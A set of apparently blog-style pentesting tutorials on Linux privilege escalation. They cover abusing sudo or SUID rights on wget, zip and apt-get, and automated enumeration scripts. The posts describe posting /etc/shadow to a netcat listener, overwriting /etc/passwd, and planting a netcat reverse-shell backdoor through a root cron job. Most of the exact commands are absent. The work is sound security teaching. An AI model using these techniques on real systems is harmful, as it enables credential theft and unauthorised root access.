Linux for Pentester: Wget Privilege Escalation

In this article, we are going to describe the entire utility of Wget command and how vital it is in Linux penetration testing. As Wget is used for downloading the files from the server so here we will learn that what else we can do by this command in Privilege Escalation.

Table of Content

Introduction to Wget

  • Major Operation performed using Wget

Exploiting Wget

  • Sudo Rights Lab setups for Privilege Escalation
  • Exploiting Sudo rights
  • SUID Lab setups for Privilege Escalation
  • Exploiting SUID

Introduction to Wget

The Wget command is a command line utility that enables the user to download single or multiple files simultaneously from internet or server by the help of many protocols like HTTP, HTTPS and FTP. This command performs many operations that can be used by any user while downloading any file from the internet such as: Downloading multiple files, downloading in the background, resuming downloading, renaming any downloaded file, Mirror downloading.

The more functionality of this command can be briefly understood by using its help command. Here we are using -h argument for this function. As we can see by the below image which showing list of many arguments that can be used with Wget command while executing it. For viewing as below image, we will simply type the command on our Linux screenshot as showing below:

Major Operation performed using Wget

To download a file:  Wget command provides assistance to their user for downloading any file/webpage in both platforms i.e. in front of the current processing screen and also in the background. Here I’m downloading putty.exe file in this article to show the overall working process of Wget command. Type below command to download a single file which use the simple syntax: Wget (option) URL

To download a file in background: As we know Wget is a non-interactive downloader that allows the user to download the file in the background too without creating any hassle with the current process.

Here I’m using -b argument for this task following by the whole command as mentioned below.

To overwrite documents to file: Here in the below image, we are showing how one can move the documents of the downloaded file to any other file. We will use the -O (uppercase) argument for this function.

Type the below-mentioned command for the same, in which I have download putty.exe and obtain the output inside raj.exe.

After completing half download I’m pausing my file by simply pressing ctrl + c to stop my downloading in mid of session just to explain “how we can retrieve or resume our downloading” if we have any network failure issue power cut or any other reasons that can stop our downloading process.

To resume any downloading process: As I have mentioned above if we have any issue or problems that can tend to fail in our downloading process by any mean then we can resume our uncompleted download by -c arguments. Find the below-mentioned command as per screenshot:

To download multiple files simultaneously:  Wget also allows the user to download multiple files simultaneously instead to download it one by one. Suppose we have any folder that contains multiple links and we want to download all the files together so we will use this command following by -i arguments.

Here I’m creating a file by the name of “link” which contains two links and I want to download both links together. Type the below-mentioned command for performing the same task:

To turn off output: Whenever we want to turn off the output of any downloading process then we can use -q arguments for the same. This argument helps the user to download the file in the background by turning off its standard output i.e. downloading the file with complete silence.

We will use Wget command with -q argument for this as shown below.

There so many options inside wget but in this post, we have discussed very of them. Because our vision is to demonstrate privilege escalation by exploiting wget, therefore in the next phase you will learn how to exploit wget for escalating root shell.

Exploiting wget

Sudo Rights Lab setups for Privilege Escalation

Now we will set up our lab of Wget command with higher privilege i.e. with administrative rights. As we know the behavior of many commands get changed after getting higher privileges similarly, we will check for the Wget command that what impact it has after getting sudo rights and how we can use it further for privilege escalation.

Refer to this link for more information about sudo rights

It can be clearly understood by the below image in which I have created a local user (test) who possess all sudo rights as root and can perform all task as admin.

To add sudo right open etc/sudoers file and type following as user Privilege specification.

Exploiting Sudo rights

Now we will start exploiting Wget service by taking the privilege of sudoer’s permission. Suppose we got the sessions of victim’s machine that tend us to have local user access of the targeted system through which we can escalate the root user rights.

Very first we will connect to the target machine with ssh, therefore, type following command to get access through local user login.

Then we look for sudo right of “test” user (if given) and found that user “test” can execute Wget command as “root” (since he has ALL user’s right) without a password.

Wget utilized the post-file option to send the content of any file. So, here we will use wget command to transfer the content of the /etc/shadow file.

Since post-file will transfer the content of shadow file to the listening IP therefore, we should turn on the listener on the destination machine. Hence open a new terminal and start the netcat listener for receiving the sent data from the source machine.

Type the below command:

As we had already turned on the netcat listener on port 80 to receive the content inside the “hash” file.

After this, we will acquire the content of the shadow file of the victim’s machine inside our hash file and then we will use john the ripper to crack the hash value.

Hmmm!! As we can observe from the given below image that it has cracked the password for user raj.

Since we got the credentials for the account of the user: raj so now, we can easily switch the user and will login as raj and further we tried to access root shell by switching.

And finally, we got the root access hence in this way we spawn the root shell by exploiting wget command.

SUID Lab setups for Privilege Escalation

SUID: Set User ID is a type of permission that allows users to execute a file with the permissions of a specified user. Those files which have suid permissions run with higher privileges.  Assume we are accessing the target system as a non-root user and we found suid bit enabled binaries, then those file/program/command can run with root privileges.

Read more from here: https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/

Now we are going to give SUID permission on wget so that a local user can take the privilege of wget as the root user.

Hence type following for enabling SUID bit:

Exploiting SUID

Now again compromise the target’s system and use find command to identify binaries having SUID permission.

So here we came to know that SUID bit is enabled for so many binary files, but we are interested in /usr/bin/wget.

As we know, wget has suid permission and taking advantage of this right we will try to escalate the root privilege by injecting a new user inside the /etc/passwd file.

First, we will open our /etc/passwd file following by tail command which will read this file from its end and help us to know that the file ends with the user “test”.

Now we are creating the salt value of password for our new user and this will be done by using “openssl” following by the command as mentioned in the screenshot below.

And we will get our hash value something like this: “$1$ignite$3eTbJm980Hz.k1NTdNxe1”; copy it for further use.

On moving ahead for the completion of this task now I have copied the entire content of /etc/passwd file in our local machine and will edit a new record for the user “ignite” then paste the above-copied hash password in the record as shown below.

Name this file as passwd and run python HTTP server for transferring this file into victim’s machine.

Now we want to inject our modified passwd file inside /etc folder to replace the original passwd file. We will use wget with -O to download the passwd file from our machine (Kali Linux) inside a/etc directory which will overwrite the existing passwd file.

Now let’s switch to ignite that owns the root user’s privileges and access the root shell.

Hence you can notice from the given below image we have escalated the root privilege by abusing

SUID permission on wget.

Author: Komal Singh is a Cyber Security Researcher and Technical Content Writer, she is completely enthusiastic pentester and Security Analyst at Ignite Technologies. Contact Here

Linux for Pentester : ZIP Privilege Escalation

Today We are going to tell you that how can we perform Privilege Escalation with Zip command. As we all know that Zip is an easy platform-based file packaging and compression utilities for Unix-like systems like Linux, Windows, etc. The Zip program is used for compressing and packaging documents.

Table of Content 

  • Introduction to ZIP
  • Major functions of ZIP command
  • Sudo Rights Lab setups for Privilege Escalation
  • Exploiting Sudo rights

Introduction to ZIP

Zip is helpful for packaging a number of distribution files, archiving files, and disk storage by compressing unused files or directories momentarily. You can pack a whole directory structure into a single command zip archive. For text files, 2:1 to 3:1 compression ratio is commonplace. But that’s not all. What else we can do with the Zip command. Let’s think out of the box. Now we are doing something creative which might have not tried before; that is, we are trying Privilege Escalation with Zip command. Let’s understand how. In order to perform this first, we will tell you what a Zip command does in Linux. So, let’s start.

Major Operations Performed Using ZIP command          

First, we will run zip -h command which means help; it tells you about all the options available in zip command as shown in the picture below.

So, our first step is to make a directory. We will first create a directory by the name Ignite and then I will create some text files into this by using touch command.

As you can see, we have created three text files by the name of file1.txt, file2.txt, file3.txt in this folder Ignite. Now we will zip file1.txt and file3.txt and give this file a name zip file.zip followed by the file names.

After this step, we will use ls -la command to check the list of the files.

Delete with -d option

-d option – It deletes the file from the zip file. You can delete a file from the archive with the -d option after generating a zip file as we did with file3.txt. We are using -d command to delete file3.txt from the zip file. So first we will specify the zip file name from where we want to delete the file.

Update with -u option

so, you will notice that file3.txt is deleted from the file.zip. Now we want to update the zip file and add a text file directly into the zip file. So, we will use -u option

by using the above command, you will notice that file2.txt is directly added into the zip file. i.e. file.zip

Move Multiple files with -m option

Now we will first create files of different extensions in our named Ignite. As you can see that we have created two files of txt, two files of pdf extension and two files of jpg extensions. So, we have files with different extensions. In order to move files of different extensions in a zip file then we need to use -m option. Here you can see that we are using -m option to move all text files in zip file. So, we will run the following command-

As we can check through ls -la that all are text files has been moved into a zip file and as well as all the text files are deleted from their original destination; which reflects that we have performed it successfully. So, we are now trying this on pdf and jpg files as well to move them in a 1.zip zip file.

Execute system command using zip

You might have not thought of what else we can do with zip command. We can run any Linux command with the zip file as we are going to do. First, we will make one txt file with touch command as we have done above. The file named raj.txt is created. Now we are trying to execute any Linux command through zip command. Run the following command along with zip file and we will get the output.

As you can see that we have executed the system command through zip command.

Exploiting Zip

Sudo Rights Lab setups for Privilege Escalation

The behaviour of zip gets changed when running with higher privilege. Let’s suppose the system admin had given sudo permission to the local user to run zip. This is can be led to privilege escalation once the system is compromised. So here we are going to put test user in the sudoers file so that test user has root the privileges to run zip command as sudo user.

Now imagine can we have Privilege shell of victim’s pc by exploiting zip program. It’s very difficult to even think of but very easy to perform. So, let’s do that. First, go to kali’s terminal and connect ubuntu with ssh as we have done in below-

Well-done. We have connected through ssh successfully.

Now we will run sudo -l command to check the list the entries of sudo files which are a member of the sudoers file. In the list, we can see that test is a member of the sudoers file and can run the zip program with root privilege.

Let’s exploit!!

Now first we will create a file with touch command as we have created a file raj.txt and now we will compress the raj.txt and through zip file, we are taking a shell. So that we will run the following command-

Now we can see that we have successfully taken the shell of the victim’s machine through zip command.

Author: Geet Madan is a Certified Ethical Hacker, Researcher and Technical Writer at Hacking Articles on Information SecurityContact here

Linux for Pentester: APT Privilege Escalation

In this article, we’ll talk about APT (apt-get) functionality and learn how helpful the apt command is for Linux penetration testing and how we’ll progress apt to scale the greater privilege shell.

Table of Content

Introduction to APT (apt-get)

  • Major Operation performed using APT (apt-get)

Exploiting APT (apt-get)

  • Sudo Rights Lab setups for Privilege Escalation
  • Exploiting Sudo rights: Method -I
  • Exploiting Sudo rights: Method -II
  • Exploiting Sudo rights: Method -III
  • Crontab Lab setups for Privilege Escalation
  • Exploiting Cron job

Introduction to APT (apt-get)

The apt command is a powerful command-line tool, which works with Ubuntu’s Advanced Packaging Tool (APT) performing such functions as installation of new software packages, upgrade of existing software packages, updating of the package list index, and even upgrading the entire Ubuntu system.

Actions of the apt command, such as installation and removal of packages, are logged in the /var/log/dpkg.log log file.

For further information about the use of APT type:

Major Operation performed using APT (apt-get)

  • Update the Package: The APT package index is essentially a database of available packages from the repositories defined in the /etc/apt/sources.list file and in the /etc/apt/sources.list.d directory. To update the local package index with the latest changes made in the repositories, type the following:

  • Upgrade Packages: Over time, updated versions of packages currently installed on your computer may become available from the package repositories (for example security updates). To upgrade your system, first update your package index as outlined above, and then type:

  • Install a Package: we can Installation of packages using the apt tool which is quite easy. For example, to install the OpenSSH-server, type the following:

  • Un-install a package: we can use remove command to un-install software packages without removing their configuration files.

  • Remove Installed packet: To remove software packages including their configuration files, use the ‘purge’ subcommand as shown below.

Exploiting APT (apt-get)

Sudo Rights Lab setups for Privilege Escalation

The behaviour of apt-get gets changed when running with higher privilege. Let’s suppose the system admin had given sudo permission to the local user to run apt-get. This is can be led to privilege escalation once the system is compromised.

First all let’s revise what is sudo Permission?

In Linux/Unix, a sudoers file inside /etc is the configuration file for sudo rights. The word sudo represent Super User Do Root privilege task. Sudoers file is that file where the users and groups with root privileges are stored to run some or all commands as root or another user.

So here, we had given sudo privilege to test user to run apt-get as root. To add sudo right open etc/sudoers file and type following as user Privilege specification.

Exploiting Sudo rights: Method -I

Let’s exploit apt-get service by abusing sudo user right. Suppose we had local user access of the targeted system and we want to escalate the root user rights.

So, first, we connect to the target machine with ssh and type following command to get access through local user login.

Then we look for sudo right of “test” user (if given) and found that user “test” can execute the apt-get command as “root” (since he has ALL user’s right) without a password.

To exploit sudo right through apt service we just run the following command which will invoke bash for us with root privilege as shown in the below image.

Exploiting Sudo rights: Method-II  

We may use apt-get for viewing changes in the packaged version of a project. We can, therefore, enter the following command in order to call a changelog, which dumps in the editor, like Man, data relating to changes to the source package.

This will open the console like a Man editor to read the apt changelog, here we can inject “!/bin/sh” and press enter to execute bash shell for us.

You get “#” shell that means that we successfully escalated the root shell, as shown in the following picture.

Exploiting Sudo rights:  Method-III

We can use dpkg to construct a package instead of using apt-get to invoke bin/bash. We will first build a temp file, in which we construct a packaging to call /bin/bash, and then install the package via apt-get.

Crontab Lab setups for Privilege Escalation

This strategy is based upon a situation in which we assume that apt.conf.d can be written in order to plan a cronjob job to update the package with the command apt-get update. As we have said, we gave /adt-conf.d complete permission.

And then schedule the task using crontab to schedule an update of the software after 2 minutes every time as shown the below image

*/2 *     ***        root       apt-get update

Exploiting Cron job

Let’s exploit apt-get service by abusing cron job as we all know cron job run as root. Suppose we had access to the targeted system locally and want the root user rights to enhanced limited shell access.

So, first we connect to the target machine with ssh and type following command:

And we know apt.conf.d file has full permission as said above (You can also manually check to ensure the writable directory using find command) in the lab setup. Therefore, we will create a malicious file inside apt.conf.d by injecting netcat reverse backdoor:

Start the netcat listener to access the reverse connection of the host machine and wait for 2 minutes to obtain the privilege shell since apt-get update task is scheduled to update the packages every time, after minute through crontab that runs as root and it runs our netcat backdoor pwn to get reverse connections as depicted in the image.

References:

https://gtfobins.github.io/

https://help.ubuntu.com/lts/serverguide/apt.html.en

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Linux Privilege Escalation via Automated Script

We all know that after compromising the victim’s machine we have a low-privileges shell that we want to escalate into a higher-privileged shell and this process is known as Privilege Escalation. Today in this article we will discuss what comes under privilege escalation and how an attacker can identify that low-privileges shell can be escalated to the higher-privileged shell. But apart from it, there are some scripts for Linux that may come in useful when trying to escalate privileges on a target system. This is generally aimed at enumeration rather than specific vulnerabilities/exploits. This type of script could save your much time.

Table of Content

  • Introduction
  • Vectors of Privilege Escalation
  • LinuEnum
  • Linuxprivchecker
  • Linux Exploit Suggester 2
  • Bashark
  • BeRoot

Introduction

Basically privilege escalation is a phase that comes after the attacker has compromised the victim’s machine where he tries to gather critical information related to systems such as hidden password and weak configured services or applications and etc. All this information help the attacker to make the post exploit against the machine for getting the higher-privileged shell.

Vectors of Privilege Escalation

  • OS Detail & Kernel Version
  • Any Vulnerable package installed or running
  • Files and Folders with Full Control or Modify Access
  • File with SUID Permissions
  • Mapped Drives (NFS)
  • Potentially Interesting Files
  • Environment Variable Path
  • Network Information (interfaces, arp, netstat)
  • Running Processes
  • Cronjobs
  • User’s Sudo Right
  • Wildcard Injection

There are several script use in Penetration testing for quickly identify potential privilege escalation vectors on Windows systems and today we are going to elaborate each script which is working smoothly.

LinuEnum

Scripted Local Linux Enumeration & Privilege Escalation Checks Shellscript that enumerates the system configuration and high-level summary of the checks/tasks performed by LinEnum.

Privileged access: Diagnose if the current user has sudo access without a password; whether the root’s home directory is accessible.

System Information: Hostname, Networking details, Current IP and etc.

User Information: Current user, List all users including uid/gid information, List root accounts, Checks if password hashes are stored in /etc/passwd.

Kernel and distribution release details.

You can download it through GitHub with help of the following command:

Once you download this script, you can simply run it by tying ./LinEnum.sh on the terminal. Hence it will dump all fetched data and system details.

Let’s Analysis Its result what it brings to us:

OS & Kernel Info: 4.15.0-36-generic, Ubuntu-16.04.1

Hostname: Ubuntu

Moreover…..

Super User Accounts: root, demo, hack, raaz

Sudo Rights User: Ignite, raj

Home Directories File Permission

Environment Information

And many more such things which come under the Post Exploitation.

Linuxprivchecker

Enumerates the system configuration and runs some privilege escalation checks as well. It is a python implementation to suggest exploits particular to the system that’s been taken under. Use wget to download the script from its source URL.

Now to use this script just type python linuxprivchecker.py on the terminal and this will enumerate file and directory permissions/contents. This script works the same as LinEnum and hunts details related to system network and user.

Let’s Analysis Its result what it brings to us.

OS & Kernel Info: 4.15.0-36-generic, Ubuntu-16.04.1

Hostname: Ubuntu

Network Info: Interface, Netstat

Writable Directory and Files for Users other than Root: /home/raj/script/shell.py

Checks if Root’s home folder is accessible

The file having SUID/SGID Permission

For example: /bin/raj/asroot.sh which is a bash script with SUID Permission

Linux Exploit Suggester 2

Next-generation exploits suggester based on Linux_Exploit_Suggester. This program performs a ‘uname -r‘ to grab the Linux operating system release version and returns a list of possible exploits.

This script is extremely useful for quickly finding privilege escalation vulnerabilities both in on-site and exam environments.

Key Improvements Include:

  • More exploits
  • Accurate wildcard matching. This expands the scope of searchable exploits.
  • Output colorization for easy viewing.
  • And more to come

You can use the ‘-k’ flag to manually enter a wildcard for the kernel/operating system release version.

Bashark

Bashark aids pentesters and security researchers during the post-exploitation phase of security audits.

It’s Features

  • Single Bash script
  • Lightweight and fast
  • Multi-platform: Unix, OSX, Solaris etc.
  • No external dependencies
  • Immune to heuristic and behavioral analysis
  • Built-in aliases of often used shell commands
  • Extends system shell with post-exploitation oriented functionalities
  • Stealthy, with custom cleanup routine activated on exit
  • Easily extensible (add new commands by creating Bash functions)
  • Full tab completion

Execute the following command to download it from the GitHub:

 

To execute the script you need to run following command:

The help command will let you know all available options provide by bashark for post exploitation.

With help of portscan option, you can scan the internal network of the compromised machine.

To fetch all configuration file you can use getconf option. It will pull out all configuration file stored inside /etc directory. Similarly, you can use the getprem option to view all binaries files of the target‘s machine.

BeRoot

BeRoot Project is a post exploitation tool to check common misconfiguration to find a way to escalate our privilege. This tool does not realize any exploitation. It mains goal is not to realize a configuration assessment of the host (listing all services, all processes, all network connection, etc.) but to print only information that has been found as a potential way to escalate our privilege.

 

To execute the script you need to run following command:

It will try to enumerate all possible loopholes which can lead to privilege Escalation, as you can observe the highlighted yellow color text represents a weak configuration that can lead to root privilege escalation whereas the red color represents the technique that can be used to exploit.

It’s Functions:

Check Files Permissions

SUID bin

NFS root Squashing

Docker

Sudo rules

Kernel Exploit

Conclusion: Above executed script are available on GitHub, you can easily download it from GitHub. These automated script try to identify the weak configuration that can lead to root privilege escalation.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here